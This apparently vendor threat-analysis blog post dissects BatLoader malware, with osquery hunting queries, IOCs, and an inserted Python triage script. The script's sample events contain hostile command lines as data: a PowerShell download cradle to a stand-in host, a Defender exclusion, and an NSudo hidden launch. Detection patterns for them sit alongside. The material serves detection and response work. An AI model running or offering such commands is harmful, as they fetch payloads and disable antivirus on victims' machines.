
Contributed by: Nandakumar KJ & Josh Lemon

 

BatLoader is stealthy initial-access malware distributed through malvertising. Because of how it embeds itself in a system, it is difficult to remove completely. It also abuses legitimate tools to elevate privileges, decrypt its payload, and run malicious scripts that deploy second-stage infostealer malware (e.g., Arkei/Vidar, Ursnif, Cobalt Strike Beacon, Rhadamanthys).

 

This blog post includes a technical analysis of the BatLoader malware along with a description of how Uptycs MDR analysts identify and remediate it. Where applicable, we have included the SQL queries used in our investigation.

 

Technical Analysis

BatLoader typically enters through malicious web pages that masquerade as trustworthy programs or software. Malvertising and fake forum comments that link to BatLoader distribution sites can direct victims to these pages.

 

Uptycs recently observed BatLoader beginning execution through an encoded PowerShell script, which used the WebClient.DownloadString method to fetch a string from a remote URL onto the local system.

 

Figure 1 - PS1 (encoded PowerShell script)

 

Upon execution of the initial malicious PowerShell script, BatLoader runs additional PowerShell commands that add an exclusion to Windows Defender as a defense evasion technique.

 

Figure 2 - MSdefender Exceptions (Windows Defender exclusion added via PowerShell)

 

The PowerShell script also downloads and executes additional executables: zkoko.exe.gpg, Nsudo.exe, and gpg4win-2.2.5.exe. These are placed in the %USERPROFILE%\AppData\Roaming directory.

 


Figure 3 - Domains accessed by PowerShell to collect second stage malware – osquery, DNS to process mapping

 

SELECT * FROM dns_lookup_events WHERE upt_asset_id = 'ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND pid = 1548 AND upt_time BETWEEN TIMESTAMP '2023-03-01 05:50:00' AND TIMESTAMP '2023-03-01 06:10:00'

 


Figure 4 - Downloaded executables – Uptycs Real-Time Actions

 

The payload is decrypted using the gpg4win.exe binary, a common Windows email and file encryption package that is legitimate software in its own right.

 

Figure 5 - gpg2_exe (payload decryption with GnuPG)

 

Nsudo.exe is a management tool for launching programs with elevated privileges. In this attack, it is used to impair defenses by hiding the window while the payload executes.
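The following is an added example, not Uptycs code, of how a defender could triage the chain described above (the encoded PowerShell download, the Defender exclusion, the GPG decryption and the NSudo launch) from process telemetry: it decodes -EncodedCommand arguments and flags each behaviour. The sample rows, the victim paths, the example.invalid URL and the NSudo arguments are constructed assumptions, not data from the investigation.

```python
import base64
import re

def encode_ps(script):
    """Encode a script as PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample rows shaped like the process_events columns queried on this page
# (pid, cmdline). Paths, the example.invalid URL and the NSudo arguments are
# assumptions; the encoded command is generated above so the example runs offline.
STAGE1 = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')"
R = r"C:\Users\victim\AppData\Roaming"
SAMPLE_EVENTS = [
    {"pid": 1548, "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + encode_ps(STAGE1)},
    {"pid": 1601, "cmdline": "powershell.exe -Command Add-MpPreference -ExclusionPath " + R},
    {"pid": 1622, "cmdline": r'"C:\Program Files (x86)\GNU\GnuPG\gpg2.exe" --batch --yes '
                             + "--decrypt --output " + R + r"\zkoko.exe " + R + r"\zkoko.exe.gpg"},
    {"pid": 1640, "cmdline": R + r"\NSudo.exe -U:T -ShowWindowMode:Hide " + R + r"\zkoko.exe"},
    {"pid": 1700, "cmdline": r"C:\Windows\explorer.exe"},  # benign control row
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# One pattern per behaviour in the chain: download cradle, Defender exclusion, GPG decryption, NSudo.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion", re.I),
    "gpg_decrypt": re.compile(r"gpg2?\.exe.*--decrypt", re.I),
    "nsudo_launch": re.compile(r"\bnsudo\.exe\b", re.I),
}

def decode_encoded_command(cmdline):
    """Return the plaintext of an encoded-command argument, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def analyze(event):
    """Match indicators against the raw command line plus any decoded PowerShell."""
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    return {"pid": event["pid"], "decoded": decoded,
            "indicators": [n for n, rx in INDICATORS.items() if rx.search(text)]}

def triage(events):
    # Keep only rows with at least one indicator, preserving order.
    return [r for r in map(analyze, events) if r["indicators"]]
```

Run `triage(SAMPLE_EVENTS)` to see the four stages of the chain flagged in order, with the decoded download cradle attached to the first hit.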

 

Figure 6 - Nsudo (payload launched with a hidden window)

 

The infostealer malware, dropped by BatLoader, attempts to collect sensitive data from victims' systems via the Windows API. This includes information about system disk drives, disk types, BIOS, processor, computer name, and serial number.

Additionally, the malware crawls the directories of the browsers installed on the victim's machine, attempting to collect the stores holding browsing history, bookmarks, cookies, autofill data, and saved login passwords. Once the sensitive data is collected, it is relayed to the threat actor's server. In the sample we observed, the command-and-control (C2) server (79.137.204.54) is associated with the Rhadamanthys malware family.

 


Figure 7 - C2 server connection – contextual details in the Uptycs detection UI

 

Uptycs MDR

The Uptycs managed detection and response engine includes built-in behavioral rules, YARA signatures, and threat intelligence data. Our skilled security analyst team constantly monitors detections and hunts for widespread and active threats in the environment.

 

From this BatLoader sample, we observed the victim system also being infected with Rhadamanthys. It was detected by YARA signature matches in memory, by behavioral rules covering actions the malware is known to perform, and by Uptycs threat intelligence matches.

 

Additionally, Uptycs EDR contextual detection provides important details about the identified malware, its mapped behavior in the ATT&CK Matrix (left pane, below), and a detection graph that shows process ancestry. Users can navigate to the toolkit data section in the detection and click on the name to learn more.

 


Figure 8 - Rhadamanthys detection

 

Built atop osquery, the Uptycs agent collects rich, high-quality telemetry from endpoints, cloud resources, and Kubernetes systems. You can see the telemetry data in the available osquery tables (e.g., process_events, powershell_events, scheduled_tasks). You can view the open-source schema here, to which Uptycs has added a significant number of additional tables.

 

Using the Uptycs Investigate feature, we were able to dig further into the malicious activity by running SQL queries against the osquery tables containing data collected from the endpoint where we executed the malware.

 


Figure 9 - Searching process_events for the activity of the suspicious user

 

SELECT * FROM process_events WHERE upt_asset_id = 'ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND login_name = 'Administrator' AND upt_time BETWEEN TIMESTAMP '2023-03-01 05:45:00' AND TIMESTAMP '2023-03-01 06:10:00'


Figure 10 - Searching socket_events to find executables that connect to the C2 server

 

SELECT * FROM socket_events WHERE upt_asset_id = 'ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND upt_day = 20230301 AND remote_address = '79.137.204.54'


Figure 11 - Searching api_events to find the API calls used by zkoko.exe

 

SELECT * FROM api_events WHERE upt_asset_id = 'ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND cmdline LIKE '%powershell.exe  -command C:\Users\Administrator\AppData\Roaming\zkoko.exe%'

 

The Uptycs Managed Detection and Response (MDR) team responds to threats using the Uptycs Protect remediation and blocking feature. From the detection graph for the detected malicious activity (below), it lets you kill, pause, or delete the process, scan the binary with YARA rules, or collect the file for additional analysis. Additionally, we have the ability to manage users, run scripts on the host machine, quarantine the machine, or investigate the malicious process further.

 


Figure 12 - Uptycs Protect – detection graph

 

Monitoring all potential threats in an environment is essential, especially threats like BatLoader that abuse legitimate tools to hide their presence. The Uptycs MDR team makes this possible by detecting and responding to threats in our customers' environments.

 

Indicators of Compromise (IOCs)

 

File name            MD5 hash
zkoko.exe.gpg        199b1499566ddc2e86e3ea3e4db7f3ff
Nsudo.exe            5cae01aea8ed390ce9bec17b6c1237e4
gpg4win-2.2.5.exe    67a4f35cae2896e3922f6f4ab5966e2b
zkoko.exe            3f82d9d43d56e56d523b2457bf6fa839

Domain/URL/IP Address

job-lionserver.site
job-lionserver.ru
81.177.165.87
185.199.111.133
79.137.204.54

Malware Samples

https://www.virustotal.com/gui/file/19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

https://www.virustotal.com/gui/file/43894c287c3ebccd30cd761dd4826518073773180ae0ab28355d604b44071441